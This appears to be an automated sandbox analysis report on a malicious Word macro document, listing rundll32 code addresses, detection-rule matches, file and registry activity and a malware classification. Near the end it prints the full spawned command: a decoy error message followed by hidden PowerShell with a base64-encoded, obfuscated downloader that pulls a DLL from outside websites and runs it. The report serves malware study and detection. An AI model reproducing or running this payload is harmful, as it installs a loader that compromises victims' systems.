                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00201773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00209B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00202349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00208F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002073AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002061B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00206DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00209586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002031E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00203FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002067E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002071EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00201BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002FA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002EF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002ED7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002F1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002E9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00212C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00223895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002202C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002242DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00218736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00217B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00224B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002263C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00212A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00214A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00219A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00227A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00225A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002162A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002160B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002180BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002148BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00211280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002212E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002188E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002226F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00211CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002220C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002196CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00228ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00220D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00227D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00220F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00222B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00227F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00228D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00225D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00220B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00221773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00215B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00218F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00229B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00222349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00228F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00216754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002169A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002117AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002273AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002261B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00226DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00229586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0022878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00217998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00216D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002231E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00223FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_0021D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002267E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002271EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00221BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_00219FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00205A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002002C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00207D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00202B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00208D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00204B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00202349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002031E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0020340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00207A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0020687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001FEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0020A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00203895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0020889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002012E2
                      Source: MAIL-0573188.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module A5gd21klfqu9c6rs, Function Document_open
                      Source: MAIL-0573188.docOLE indicator, VBA macros: true
                      Source: 00000005.00000002.2098977444.00000000003A6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2099018850.0000000001BC6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@22/8@6/6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F1C88 CreateToolhelp32Snapshot,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$IL-0573188.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC5DD.tmpJump to behavior
                      Source: MAIL-0573188.docOLE indicator, Word Document stream: true
                      Source: MAIL-0573188.docOLE document summary: title field not present or empty
                      Source: MAIL-0573188.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ............h........................... .-.......-...............!.......!.............#...............................h.......5kU.......!.....
                      Source: C:\Windows\System32\msg.exeConsole Write: ............h...$...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.!.....L.................!.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......(.Q.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................*..j....................................}..v.... Z......0...............................$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................*..j..... ..............................}..v.....Z......0...............(.Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v....xg......0...............................$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......Q.............................}..v.....h......0.................Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............z..j....................................}..v............0...............................$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............z..j..... ..............................}..v....P.......0.................Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............J..j.....(..............................}..v............0.................Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+...............J..j.....(..............................}..v....P.......0.................Q.............$...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                      Source: MAIL-0573188.docVirustotal: Detection: 66%
                      Source: MAIL-0573188.docMetadefender: Detection: 47%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
